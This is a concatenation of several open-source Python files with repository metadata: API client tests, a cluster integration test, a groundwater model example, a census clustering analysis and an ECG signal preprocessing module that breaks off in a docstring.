c7c5b3d53e6ad031199ab57c86f15523078de6cc | 1,969 | py | Python | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
]
| 6 | 2018-08-15T13:29:22.000Z | 2020-09-12T14:39:20.000Z | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
]
| 26 | 2018-08-15T13:08:49.000Z | 2020-01-12T22:27:38.000Z | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
]
| 4 | 2018-08-15T13:52:26.000Z | 2019-04-28T17:09:04.000Z | from collections import OrderedDict
import pytest
import vcr
try: # Python 2.7
# requests's ``json()`` function returns strings as unicode (as per the
# JSON spec). In 2.7, those are of type unicode rather than str. basestring
# was created to help with that.
# https://docs.python.org/2/library/functions.html#basestring
basestring = basestring
except NameError:
basestring = str
@pytest.mark.incremental
class TestShow(object):
"""These don't require authentication to Game Pass."""
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_desc(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.desc, basestring)
# content is not required
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_logo(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.logo, basestring)
assert show.logo
@vcr.use_cassette('public_API/europe_show.yaml')
@staticmethod
def test_name(gp):
shows = gp.shows
for s in shows:
show = shows[s]
isinstance(show.name, basestring)
assert show.name
@vcr.use_cassette('public_API/europe_show_seasons.yaml')
@staticmethod
def test_seasons(gp):
shows = gp.shows
for s in shows:
show = shows[s]
assert type(show.seasons) is OrderedDict
assert show.seasons
prev = 9999
for s in show.seasons:
season = show.seasons[s]
# TODO: assert it has content
# TODO: assert is type season
# make sure the years look sane-ish
assert int(s) > 2000 and int(s) < 2050
# make sure it's sorted high to low
assert int(prev) > int(s)
prev = s
| 24.6125 | 79 | 0.584053 | 1,532 | 0.77806 | 0 | 0 | 1,557 | 0.790757 | 0 | 0 | 582 | 0.295582 |
c7c66a8f8b52a73b0ced73b9208760d1628d3b03 | 3,165 | py | Python | integration_test/basic_op_capi.py | cl9200/nbase-arc | 47c124b11b0bb2e8a8428c6d628ce82dc24c1ade | [
"Apache-2.0"
]
| null | null | null | integration_test/basic_op_capi.py | cl9200/nbase-arc | 47c124b11b0bb2e8a8428c6d628ce82dc24c1ade | [
"Apache-2.0"
]
| null | null | null | integration_test/basic_op_capi.py | cl9200/nbase-arc | 47c124b11b0bb2e8a8428c6d628ce82dc24c1ade | [
"Apache-2.0"
]
| null | null | null | #
# Copyright 2015 Naver Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import unittest
import testbase
import default_cluster
import util
import os
import constant
import config
import time
import telnetlib
import signal
class TestBasicOpCAPI(unittest.TestCase):
cluster = config.clusters[2]
@classmethod
def setUpClass(cls):
return 0
@classmethod
def tearDownClass(cls):
return 0
def setUp(self):
util.set_process_logfile_prefix( 'TestBasicOp_%s' % self._testMethodName )
self.conf_checker = default_cluster.initialize_starting_up_smr_before_redis(self.cluster, arch=self.arch)
self.assertIsNotNone(self.conf_checker, 'failed to initialize cluster')
def tearDown(self):
testbase.defaultTearDown(self)
def run_capi_server(self):
# run capi test server
_capi_server_conf = """
zookeeper 127.0.0.1:2181
cluster_name %s
port 6200
daemonize no
num_conn_per_gw 2
init_timeout_millis 10000
log_level INFO
log_file_prefix "capi_server"
max_fd 4096
conn_reconnect_millis 1000
zk_reconnect_millis 1000
zk_session_timeout_millis 10000
local_proxy_query_timeout_millis 10000
""" % self.cluster['cluster_name']
old_cwd = os.path.abspath( os.getcwd() )
os.chdir(util.capi_dir(0))
f = open('capi_server.conf', 'w')
f.write(_capi_server_conf)
f.close()
os.chdir(old_cwd)
if self.arch is 32:
cmd = "./%s capi_server.conf" % constant.CAPI32_TEST_SERVER
else:
cmd = "./%s capi_server.conf" % constant.CAPI_TEST_SERVER
capi_server = util.exec_proc_async(util.capi_dir(0),
cmd, True, None, subprocess.PIPE, None)
# ping check
while True:
try:
t = telnetlib.Telnet('127.0.0.1', 6200)
break
except:
time.sleep(1)
continue
t.write("ping\r\n")
t.read_until('+PONG\r\n')
t.close()
return capi_server
def stop_process(self, capi_server):
capi_server.send_signal(signal.SIGTERM)
capi_server.wait()
def test_basic_op_capi(self):
capi_server = self.run_capi_server()
f = open("%s/test_basicop_output_capi%d" % (constant.logdir, self.arch), 'w')
p = util.exec_proc_async("../redis-%s" % constant.REDISVER,
"./runtest_gw --accurate --gw-port 6200",
True, None, f, None)
ret = p.wait()
f.close()
self.assertEquals(0, ret)
self.stop_process(capi_server)
| 28.00885 | 113 | 0.653081 | 2,415 | 0.763033 | 0 | 0 | 111 | 0.035071 | 0 | 0 | 1,147 | 0.362401 |
c7c6a85099fcd6a3265a36a9b36bdf7fa4e9b9a7 | 5,509 | py | Python | examples/scripts/flopy_lake_example.py | andrewcalderwood/flopy | 0432ce96a0a5eec4d20adb4d384505632a2db3dc | [
"CC0-1.0",
"BSD-3-Clause"
]
| 351 | 2015-01-03T15:18:48.000Z | 2022-03-31T09:46:43.000Z | examples/scripts/flopy_lake_example.py | andrewcalderwood/flopy | 0432ce96a0a5eec4d20adb4d384505632a2db3dc | [
"CC0-1.0",
"BSD-3-Clause"
]
| 1,256 | 2015-01-15T21:10:42.000Z | 2022-03-31T22:43:06.000Z | examples/scripts/flopy_lake_example.py | andrewcalderwood/flopy | 0432ce96a0a5eec4d20adb4d384505632a2db3dc | [
"CC0-1.0",
"BSD-3-Clause"
]
| 553 | 2015-01-31T22:46:48.000Z | 2022-03-31T17:43:35.000Z | import os
import sys
import numpy as np
import matplotlib.pyplot as plt
import flopy
def run():
workspace = os.path.join("lake")
# make sure workspace directory exists
if not os.path.exists(workspace):
os.makedirs(workspace)
fext = "png"
narg = len(sys.argv)
iarg = 0
if narg > 1:
while iarg < narg - 1:
iarg += 1
basearg = sys.argv[iarg].lower()
if basearg == "--pdf":
fext = "pdf"
# save the starting path
cwdpth = os.getcwd()
# change to the working directory
os.chdir(workspace)
# We are creating a square model with a specified head equal to `h1` along all boundaries.
# The head at the cell in the center in the top layer is fixed to `h2`. First, set the name
# of the model and the parameters of the model: the number of layers `Nlay`, the number of rows
# and columns `N`, lengths of the sides of the model `L`, aquifer thickness `H`, hydraulic
# conductivity `Kh`
name = "lake_example"
h1 = 100
h2 = 90
Nlay = 10
N = 101
L = 400.0
H = 50.0
Kh = 1.0
# Create a MODFLOW model and store it (in this case in the variable `ml`, but you can call it
# whatever you want). The modelname will be the name given to all MODFLOW files (input and output).
# The exe_name should be the full path to your MODFLOW executable. The version is either 'mf2k'
# for MODFLOW2000 or 'mf2005'for MODFLOW2005.
ml = flopy.modflow.Modflow(
modelname=name, exe_name="mf2005", version="mf2005"
)
# Define the discretization of the model. All layers are given equal thickness. The `bot` array
# is build from the `Hlay` values to indicate top and bottom of each layer, and `delrow` and
# `delcol` are computed from model size `L` and number of cells `N`. Once these are all computed,
# the Discretization file is built.
bot = np.linspace(-H / Nlay, -H, Nlay)
delrow = delcol = L / (N - 1)
dis = flopy.modflow.ModflowDis(
ml,
nlay=Nlay,
nrow=N,
ncol=N,
delr=delrow,
delc=delcol,
top=0.0,
botm=bot,
laycbd=0,
)
# Next we specify the boundary conditions and starting heads with the Basic package. The `ibound`
# array will be `1` in all cells in all layers, except for along the boundary and in the cell at
# the center in the top layer where it is set to `-1` to indicate fixed heads. The starting heads
# are used to define the heads in the fixed head cells (this is a steady simulation, so none of
# the other starting values matter). So we set the starting heads to `h1` everywhere, except for
# the head at the center of the model in the top layer.
Nhalf = int((N - 1) / 2)
ibound = np.ones((Nlay, N, N), dtype=int)
ibound[:, 0, :] = -1
ibound[:, -1, :] = -1
ibound[:, :, 0] = -1
ibound[:, :, -1] = -1
ibound[0, Nhalf, Nhalf] = -1
start = h1 * np.ones((N, N))
start[Nhalf, Nhalf] = h2
# create external ibound array and starting head files
files = []
hfile = f"{name}_strt.ref"
np.savetxt(hfile, start)
hfiles = []
for kdx in range(Nlay):
file = f"{name}_ib{kdx + 1:02d}.ref"
files.append(file)
hfiles.append(hfile)
np.savetxt(file, ibound[kdx, :, :], fmt="%5d")
bas = flopy.modflow.ModflowBas(ml, ibound=files, strt=hfiles)
# The aquifer properties (really only the hydraulic conductivity) are defined with the
# LPF package.
lpf = flopy.modflow.ModflowLpf(ml, hk=Kh)
# Finally, we need to specify the solver we want to use (PCG with default values), and the
# output control (using the default values). Then we are ready to write all MODFLOW input
# files and run MODFLOW.
pcg = flopy.modflow.ModflowPcg(ml)
oc = flopy.modflow.ModflowOc(ml)
ml.write_input()
ml.run_model()
# change back to the starting directory
os.chdir(cwdpth)
# Once the model has terminated normally, we can read the heads file. First, a link to the heads
# file is created with `HeadFile`. The link can then be accessed with the `get_data` function, by
# specifying, in this case, the step number and period number for which we want to retrieve data.
# A three-dimensional array is returned of size `nlay, nrow, ncol`. Matplotlib contouring functions
# are used to make contours of the layers or a cross-section.
hds = flopy.utils.HeadFile(os.path.join(workspace, f"{name}.hds"))
h = hds.get_data(kstpkper=(0, 0))
x = y = np.linspace(0, L, N)
c = plt.contour(x, y, h[0], np.arange(90, 100.1, 0.2))
plt.clabel(c, fmt="%2.1f")
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake1.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
x = y = np.linspace(0, L, N)
c = plt.contour(x, y, h[-1], np.arange(90, 100.1, 0.2))
plt.clabel(c, fmt="%1.1f")
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake2.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
z = np.linspace(-H / Nlay / 2, -H + H / Nlay / 2, Nlay)
c = plt.contour(x, z, h[:, 50, :], np.arange(90, 100.1, 0.2))
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake3.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
return 0
if __name__ == "__main__":
success = run()
| 35.089172 | 103 | 0.626429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,760 | 0.500998 |
c7c6afa7ba07a568b76988ebc296a4b468c42738 | 11,428 | py | Python | P2/Caso2/clustering.py | Ocete/Inteligenica-de-Negocio | 0c3bb3914893c608790002743530aba535be7249 | [
"MIT"
]
| null | null | null | P2/Caso2/clustering.py | Ocete/Inteligenica-de-Negocio | 0c3bb3914893c608790002743530aba535be7249 | [
"MIT"
]
| null | null | null | P2/Caso2/clustering.py | Ocete/Inteligenica-de-Negocio | 0c3bb3914893c608790002743530aba535be7249 | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
'''
Documentación sobre clustering en Python:
http://scikit-learn.org/stable/modules/clustering.html
http://www.learndatasci.com/k-means-clustering-algorithms-python-intro/
http://hdbscan.readthedocs.io/en/latest/comparing_clustering_algorithms.html
https://joernhees.de/blog/2015/08/26/scipy-hierarchical-clustering-and-dendrogram-tutorial/
http://www.learndatasci.com/k-means-clustering-algorithms-python-intro/
'''
import time
import csv
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from sklearn import preprocessing
from sklearn import metrics
from sklearn import cluster
from math import floor
import seaborn as sns
# Cosas bonitas por defecto
sns.set()
def norm_to_zero_one(df):
return (df - df.min()) * 1.0 / (df.max() - df.min())
censo = pd.read_csv('../mujeres_fecundidad_INE_2018.csv')
'''
for col in censo:
missing_count = sum(pd.isnull(censo[col]))
if missing_count > 0:
print(col,missing_count)
#'''
#Se pueden reemplazar los valores desconocidos por un número
#censo = censo.replace(np.NaN,0)
# Sustituimos valores perdidos con la media
for col in censo:
censo[col].fillna(censo[col].mean(), inplace=True)
#seleccionar casos
subset = censo.loc[(censo['TRAREPRO']==1) & (censo['NEMBTRAREPRO']<=6)]
# Seleccionar variables
usadas = ['NHIJOS', 'TIPOTRAREPRO', 'NMESESTRAREPRO', 'NEMBTRAREPRO']
X = subset[usadas]
X_normal = X.apply(norm_to_zero_one)
print('Tamaño de la población tras filtrado: ',len(X_normal.index))
for col in X:
missing_count = sum(pd.isnull(censo[col]))
if missing_count > 0:
print(col,missing_count, ' AFTER')
algoritmos = (('KMeans', cluster.KMeans(init='k-means++', n_clusters=5, n_init=5)),
('MeanShift', cluster.MeanShift(cluster_all=False, min_bin_freq=3)),
('Ward', cluster.AgglomerativeClustering(n_clusters=4, linkage='ward')),
('DBScan', cluster.DBSCAN(eps=0.35, min_samples=5)),
('Birch', cluster.Birch(threshold=0.1,n_clusters=5)))
cluster_predict = {}
calinski = {}
silh = {}
times = {}
n_clusters = {}
clusters_fig, clusters_axis = plt.subplots(3, 2, figsize=(10,10))
clusters_colors = ['gold', 'yellowgreen', 'lightcoral', 'lightskyblue', '#ffb347']
ijs = [(0,0), (0,1), (1,0), (1,1), (2,0), (2,1)]
for i_alg, par in enumerate(algoritmos):
name, alg = par
print('----- Ejecutando ' + name,)
t = time.time()
cluster_predict[name] = alg.fit_predict(X_normal)
tiempo = time.time() - t
times[name] = tiempo
metric_CH = metrics.calinski_harabasz_score(X_normal, cluster_predict[name])
calinski[name] = metric_CH
metric_SC = metrics.silhouette_score(X_normal, cluster_predict[name], metric='euclidean', sample_size=floor(len(X)), random_state=123456)
silh[name] = metric_SC
# Asignamos de clusters a DataFrame
clusters = pd.DataFrame(cluster_predict[name],index=X.index,columns=['cluster'])
if (name == 'KMeans'):
clusters_kmeans = clusters
alg_kmeans = alg
elif (name == 'Ward'):
clusters_ward = clusters
print("Tamaño de cada cluster:")
size = clusters['cluster'].value_counts()
cluster_fractions = []
for num,i in size.iteritems():
print('%s: %5d (%5.2f%%)' % (num,i,100*i/len(clusters)))
cluster_fractions.append( 100*i/len(clusters) )
n_clusters[name] = len(size)
# Bar charts
if ( len(cluster_fractions) > 7 ):
cluster_fractions = cluster_fractions[0:6]
i, j = ijs[i_alg]
y_pos = np.arange(len(cluster_fractions))
labels = [ "Cluster " + str(i) for i in range(len(cluster_fractions)) ]
clusters_axis[i, j].bar(y_pos, cluster_fractions, tick_label=labels, color=clusters_colors)
clusters_axis[i, j].set_ylim(0, 100)
clusters_axis[i, j].set_title(name)
if (j == 0):
clusters_axis[i, j].set_ylabel("Cluster size (%)")
clusters_axis[2,1].remove()
#clusters_fig.savefig("clusters.png")
plt.show()
from prettytable import PrettyTable
header = ['Algoritmo', 'CH', 'Silh', 'Tiempo', 'Número de clusters']
tabla = PrettyTable(header)
for name, alg in algoritmos:
tabla.add_row([name,
"{0:.2f}".format(calinski[name]),
"{0:.2f}".format(silh[name]),
"{0:.2f}".format(times[name]),
n_clusters[name]])
print(tabla)
# Escribir los datos en un general.csv
'''
with open('general.csv', mode='w+', newline='') as file:
writer = csv.DictWriter(file, fieldnames=header)
writer.writeheader()
for name, _ in algoritmos:
writer.writerow({'Algoritmo': name,
'CH': "{0:.2f}".format(calinski[name]),
'Silh': "{0:.2f}".format(silh[name]),
'Tiempo': "{0:.2f}".format(times[name]),
'Número de clusters': n_clusters[name]})
#'''
# ----------------------- FUNCIONES DE DISTRIBUCIÓN ---------
print("---------- Preparando funciones de distribución...")
n_clusters_ward = n_clusters['Ward']
n_var = len(usadas)
X_ward = pd.concat([X, clusters_ward], axis=1)
fig, axes = plt.subplots(n_clusters_ward, n_var, sharey=True, figsize=(15,15))
fig.subplots_adjust(wspace=0, hspace=0)
colors = sns.color_palette(palette=None, n_colors=n_clusters_ward, desat=None)
rango = []
for j in range(n_var):
rango.append([X_ward[usadas[j]].min(), X_ward[usadas[j]].max()])
for i in range(n_clusters_ward):
dat_filt = X_ward.loc[X_ward['cluster']==i]
for j in range(n_var):
#ax = sns.kdeplot(dat_filt[usadas[j]], label="", shade=True, color=colors[i], ax=axes[i,j])
ax = sns.boxplot(dat_filt[usadas[j]], color=colors[i], flierprops={'marker':'o','markersize':4}, ax=axes[i,j])
if (i==n_clusters_ward-1):
axes[i,j].set_xlabel(usadas[j])
else:
axes[i,j].set_xlabel("")
if (j==0):
axes[i,j].set_ylabel("Cluster "+str(i))
else:
axes[i,j].set_ylabel("")
axes[i,j].set_yticks([])
axes[i,j].grid(axis='x', linestyle='-', linewidth='0.2', color='gray')
axes[i,j].grid(axis='y', b=False)
ax.set_xlim(rango[j][0]-0.05*(rango[j][1]-rango[j][0]),rango[j][1]+0.05*(rango[j][1]-rango[j][0]))
plt.show()
#fig.savefig("boxes.png")
# ---------------- SCATTER MATRIX -----------------------
'''
plt.clf()
print("---------- Preparando el scatter matrix...")
# Se añade la asignación de clusters como columna a X
variables = list(X_ward)
variables.remove('cluster')
sns_plot = sns.pairplot(X_ward, vars=variables, hue="cluster", palette='Paired', plot_kws={"s": 25}, diag_kind="hist")
sns_plot.fig.subplots_adjust(wspace=.03, hspace=.03);
# sns_plot.savefig("scatter_matrix.png")
plt.show()
#'''
# ----------------------- DENDOGRAMAS -----------------------
#En clustering hay que normalizar para las métricas de distancia
# X_normal = preprocessing.normalize(X, norm='l2')
X_normal = (X - X.min() ) / (X.max() - X.min())
#Vamos a usar este jerárquico y nos quedamos con 100 clusters, es decir, cien ramificaciones del dendrograma
ward = cluster.AgglomerativeClustering(n_clusters=20, linkage='ward')
name, algorithm = ('Ward', ward)
cluster_predict = {}
k = {}
t = time.time()
cluster_predict[name] = algorithm.fit_predict(X_normal)
tiempo = time.time() - t
k[name] = len(set(cluster_predict[name]))
# Se convierte la asignación de clusters a DataFrame
clusters = pd.DataFrame(cluster_predict['Ward'],index=X.index,columns=['cluster'])
# Y se añade como columna a X
X_cluster = pd.concat([X, clusters], axis=1)
# Filtro quitando los elementos (outliers) que caen en clusters muy pequeños en el jerárquico
min_size = 3
X_filtrado = X
'''
X_cluster[X_cluster.groupby('cluster').cluster.transform(len) > min_size]
k_filtrado = len(set(X_filtrado['cluster']))
print("De los {:.0f} clusters hay {:.0f} con más de {:.0f} elementos. Del total de {:.0f} elementos, se seleccionan {:.0f}".format(k['Ward'],k_filtrado,min_size,len(X),len(X_filtrado)))
X_filtrado = X_filtrado.drop('cluster', 1)
X_filtrado = X
#'''
#Normalizo el conjunto filtrado
X_filtrado_normal = preprocessing.normalize(X_filtrado, norm='l2')
# Obtengo el dendrograma usando scipy, que realmente vuelve a ejecutar el clustering jerárquico
from scipy.cluster import hierarchy
linkage_array = hierarchy.ward(X_filtrado_normal)
plt.clf()
dendro = hierarchy.dendrogram(linkage_array,orientation='left', p=10, truncate_mode='lastp') #lo pongo en horizontal para compararlo con el generado por seaborn
# puedo usar "p=10,truncate_mode='lastp'" para cortar el dendrograma en 10 hojas
# Dendograma usando seaborn (que a su vez usa scipy) para incluir un heatmap
X_filtrado_normal_DF = pd.DataFrame(X_filtrado_normal, index=X_filtrado.index, columns=usadas)
# Añadimos una columna de label para indicar el cluster al que pertenece cada objeto
labels = X_ward['cluster']
lut = dict(zip(set(labels), sns.color_palette(palette="Blues_d", n_colors=n_clusters_ward)))
row_colors = pd.DataFrame(labels)['cluster'].map(lut)
clustergrid = sns.clustermap(X_filtrado_normal_DF, method='ward', row_colors=row_colors, col_cluster=False, figsize=(20,10), cmap="YlGnBu", yticklabels=False)
# Para añadir los labels reordenados. Ahora mismo no salen los colores en la
# columna donde deberian. Intuyo que esto se debe a que los ids no encajan.
#'''
ordering = clustergrid.dendrogram_row.reordered_ind
labels_list = [x for _, x in sorted(zip(ordering,labels), key=lambda pair: pair[0])]
labels = pd.Series(labels_list, index=X_filtrado_normal_DF.index, name='cluster')
lut = dict(zip(set(labels), sns.color_palette(palette="Blues_d", n_colors=n_clusters_ward)))
row_colors = pd.DataFrame(labels)['cluster'].map(lut)
clustergrid = sns.clustermap(X_filtrado_normal_DF, method='ward', row_colors=row_colors, col_cluster=False, figsize=(20,10), cmap="YlGnBu", yticklabels=False)
#'''
#plt.savefig("dendograma.png")
# ----------------------- HEATMAPS -----------------------
#'''
plt.figure(1)
centers = pd.DataFrame(alg_kmeans.cluster_centers_, columns=list(X))
centers_desnormal = centers.copy()
centers_desnormal = centers.drop([4])
# Calculamos los centroides
X = pd.concat([X, clusters_ward], axis=1)
for variable in list(centers):
for k_cluster in range(n_clusters_ward):
centroide = X.loc[(clusters_ward['cluster']==k_cluster)][variable].mean()
centers_desnormal.loc[k_cluster, variable] = centroide
# Normalizamos
centers_normal2 = centers_desnormal.copy()
centers_normal2 = (centers_normal2 - centers_normal2.min() ) / (centers_normal2.max() - centers_normal2.min())
import matplotlib.pyplot as plt
heatmap_fig, ax = plt.subplots(figsize=(10,10))
heatmap = sns.heatmap(centers_normal2, cmap="YlGnBu", annot=centers_desnormal, fmt='.3f')
# Para evitar que los bloques de arriba y abajo se corten por la mitad
bottom, top = ax.get_ylim()
ax.set_ylim(bottom + 0.5, top - 0.5)
#heatmap_fig.savefig("heatmap.png")
#'''
| 37.468852 | 187 | 0.651995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,561 | 0.398236 |
c7c71735421912226dadf924d3330fb19e4f6af5 | 9,029 | py | Python | signal_processing/ecg_preproc.py | DeepPSP/cpsc2020 | 47acb884ea1f2f819e564d8a17ad37001ed0df27 | [
"BSD-3-Clause"
]
| 1 | 2021-12-07T11:44:48.000Z | 2021-12-07T11:44:48.000Z | signal_processing/ecg_preproc.py | wenh06/cpsc2020 | 47acb884ea1f2f819e564d8a17ad37001ed0df27 | [
"BSD-3-Clause"
]
| null | null | null | signal_processing/ecg_preproc.py | wenh06/cpsc2020 | 47acb884ea1f2f819e564d8a17ad37001ed0df27 | [
"BSD-3-Clause"
]
| 1 | 2021-05-25T14:56:02.000Z | 2021-05-25T14:56:02.000Z | """
preprocess of (single lead) ecg signal:
band pass --> remove baseline --> find rpeaks --> denoise (mainly deal with motion artefact)
TODO:
1. motion artefact detection,
and slice the signal into continuous (no motion artefact within) segments
2. to add
References:
-----------
[1] https://github.com/PIA-Group/BioSPPy
[2] to add
"""
import os, time
import multiprocessing as mp
from copy import deepcopy
from numbers import Real
from typing import Union, Optional, Any, List, Dict
import numpy as np
from easydict import EasyDict as ED
from scipy.ndimage.filters import median_filter
from scipy.signal.signaltools import resample
from scipy.io import savemat
# from scipy.signal import medfilt
# https://github.com/scipy/scipy/issues/9680
try:
from biosppy.signals.tools import filter_signal
except:
from references.biosppy.biosppy.signals.tools import filter_signal
from cfg import PreprocCfg
from .ecg_rpeaks import (
xqrs_detect, gqrs_detect, pantompkins,
hamilton_detect, ssf_detect, christov_detect, engzee_detect, gamboa_detect,
)
from .ecg_rpeaks_dl import seq_lab_net_detect
__all__ = [
"preprocess_signal",
"parallel_preprocess_signal",
"denoise_signal",
]
QRS_DETECTORS = {
"xqrs": xqrs_detect,
"gqrs": gqrs_detect,
"pantompkins": pantompkins,
"hamilton": hamilton_detect,
"ssf": ssf_detect,
"christov": christov_detect,
"engzee": engzee_detect,
"gamboa": gamboa_detect,
"seq_lab": seq_lab_net_detect,
}
DL_QRS_DETECTORS = [
"seq_lab",
]
def preprocess_signal(raw_sig:np.ndarray, fs:Real, config:Optional[ED]=None) -> Dict[str, np.ndarray]:
""" finished, checked,
Parameters:
-----------
raw_sig: ndarray,
the raw ecg signal
fs: real number,
sampling frequency of `raw_sig`
config: dict, optional,
extra process configuration,
`PreprocCfg` will be updated by this `config`
Returns:
--------
retval: dict,
with items
- 'filtered_ecg': the array of the processed ecg signal
- 'rpeaks': the array of indices of rpeaks; empty if 'rpeaks' in `config` is not set
NOTE:
-----
output (`retval`) are resampled to have sampling frequency
equal to `config.fs` (if `config` has item `fs`) or `PreprocCfg.fs`
"""
filtered_ecg = raw_sig.copy()
cfg = deepcopy(PreprocCfg)
cfg.update(config or {})
if fs != cfg.fs:
filtered_ecg = resample(filtered_ecg, int(round(len(filtered_ecg)*cfg.fs/fs)))
# remove baseline
if 'baseline' in cfg.preproc:
window1 = 2 * (cfg.baseline_window1 // 2) + 1 # window size must be odd
window2 = 2 * (cfg.baseline_window2 // 2) + 1
baseline = median_filter(filtered_ecg, size=window1, mode='nearest')
baseline = median_filter(baseline, size=window2, mode='nearest')
filtered_ecg = filtered_ecg - baseline
# filter signal
if 'bandpass' in cfg.preproc:
filtered_ecg = filter_signal(
signal=filtered_ecg,
ftype='FIR',
band='bandpass',
order=int(0.3 * fs),
sampling_rate=fs,
frequency=cfg.filter_band,
)['signal']
if cfg.rpeaks and cfg.rpeaks.lower() not in DL_QRS_DETECTORS:
# dl detectors not for parallel computing using `mp`
detector = QRS_DETECTORS[cfg.rpeaks.lower()]
rpeaks = detector(sig=filtered_ecg, fs=fs).astype(int)
else:
rpeaks = np.array([], dtype=int)
retval = ED({
"filtered_ecg": filtered_ecg,
"rpeaks": rpeaks,
})
return retval
def parallel_preprocess_signal(raw_sig:np.ndarray, fs:Real, config:Optional[ED]=None, save_dir:Optional[str]=None, save_fmt:str='npy', verbose:int=0) -> Dict[str, np.ndarray]:
""" finished, checked,
Parameters:
-----------
raw_sig: ndarray,
the raw ecg signal
fs: real number,
sampling frequency of `raw_sig`
config: dict, optional,
extra process configuration,
`PreprocCfg` will `update` this `config`
save_dir: str, optional,
directory for saving the outcome ('filtered_ecg' and 'rpeaks')
save_fmt: str, default 'npy',
format of the save files, 'npy' or 'mat'
Returns:
--------
retval: dict,
with items
- 'filtered_ecg': the array of the processed ecg signal
- 'rpeaks': the array of indices of rpeaks; empty if 'rpeaks' in `config` is not set
NOTE:
-----
output (`retval`) are resampled to have sampling frequency
equal to `config.fs` (if `config` has item `fs`) or `PreprocCfg.fs`
"""
start_time = time.time()
cfg = deepcopy(PreprocCfg)
cfg.update(config or {})
epoch_len = int(cfg.parallel_epoch_len * fs)
epoch_overlap_half = int(cfg.parallel_epoch_overlap * fs) // 2
epoch_overlap = 2 * epoch_overlap_half
epoch_forward = epoch_len - epoch_overlap
if len(raw_sig) <= 3 * epoch_len: # too short, no need for parallel computing
retval = preprocess_signal(raw_sig, fs, cfg)
if cfg.rpeaks and cfg.rpeaks.lower() in DL_QRS_DETECTORS:
rpeaks = QRS_DETECTORS[cfg.rpeaks.lower()](sig=raw_sig, fs=fs, verbose=verbose).astype(int)
retval.rpeaks = rpeaks
return retval
l_epoch = [
raw_sig[idx*epoch_forward: idx*epoch_forward + epoch_len] \
for idx in range((len(raw_sig)-epoch_overlap)//epoch_forward)
]
if cfg.parallel_keep_tail:
tail_start_idx = epoch_forward * len(l_epoch) + epoch_overlap
if len(raw_sig) - tail_start_idx < 30 * fs: # less than 30s, make configurable?
# append to the last epoch
l_epoch[-1] = np.append(l_epoch[-1], raw_sig[tail_start_idx:])
else: # long enough
tail_epoch = raw_sig[tail_start_idx-epoch_overlap:]
l_epoch.append(tail_epoch)
cpu_num = max(1, mp.cpu_count()-3)
with mp.Pool(processes=cpu_num) as pool:
result = pool.starmap(
func=preprocess_signal,
iterable=[(e, fs, cfg) for e in l_epoch],
)
if cfg.parallel_keep_tail:
tail_result = result[-1]
result = result[:-1]
filtered_ecg = result[0]['filtered_ecg'][:epoch_len-epoch_overlap_half]
rpeaks = result[0]['rpeaks'][np.where(result[0]['rpeaks']<epoch_len-epoch_overlap_half)[0]]
for idx, e in enumerate(result[1:]):
filtered_ecg = np.append(
filtered_ecg, e['filtered_ecg'][epoch_overlap_half: -epoch_overlap_half]
)
epoch_rpeaks = e['rpeaks'][np.where( (e['rpeaks'] >= epoch_overlap_half) & (e['rpeaks'] < epoch_len-epoch_overlap_half) )[0]]
rpeaks = np.append(rpeaks, (idx+1)*epoch_forward + epoch_rpeaks)
if cfg.parallel_keep_tail:
filtered_ecg = np.append(filtered_ecg, tail_result['filtered_ecg'][epoch_overlap_half:])
tail_rpeaks = tail_result['rpeaks'][np.where(tail_result['rpeaks'] >= epoch_overlap_half)[0]]
rpeaks = np.append(rpeaks, len(result)*epoch_forward + tail_rpeaks)
if verbose >= 1:
if cfg.rpeaks.lower() in DL_QRS_DETECTORS:
print(f"signal processing took {round(time.time()-start_time, 3)} seconds")
else:
print(f"signal processing and R peaks detection took {round(time.time()-start_time, 3)} seconds")
start_time = time.time()
if cfg.rpeaks and cfg.rpeaks.lower() in DL_QRS_DETECTORS:
rpeaks = QRS_DETECTORS[cfg.rpeaks.lower()](sig=raw_sig, fs=fs, verbose=verbose).astype(int)
if verbose >= 1:
print(f"R peaks detection using {cfg.rpeaks} took {round(time.time()-start_time, 3)} seconds")
if save_dir:
# NOTE: this part is not tested
os.makedirs(save_dir, exist_ok=True)
if save_fmt.lower() == 'npy':
np.save(os.path.join(save_dir, "filtered_ecg.npy"), filtered_ecg)
np.save(os.path.join(save_dir, "rpeaks.npy"), rpeaks)
elif save_fmt.lower() == 'mat':
# save into 2 files, keep in accordance
savemat(os.path.join(save_dir, "filtered_ecg.mat"), {"filtered_ecg": filtered_ecg}, format='5')
savemat(os.path.join(save_dir, "rpeaks.mat"), {"rpeaks": rpeaks}, format='5')
retval = ED({
"filtered_ecg": filtered_ecg,
"rpeaks": rpeaks,
})
return retval
"""
to check correctness of the function `parallel_preprocess_signal`,
say for record A01, one can call
>>> raw_sig = loadmat("./data/A01.mat")['ecg'].flatten()
>>> processed = parallel_preprocess_signal(raw_sig, 400)
>>> print(len(processed['filtered_ecg']) - len(raw_sig))
>>> start_t = int(3600*24.7811)
>>> len_t = 10
>>> fig, ax = plt.subplots(figsize=(20,6))
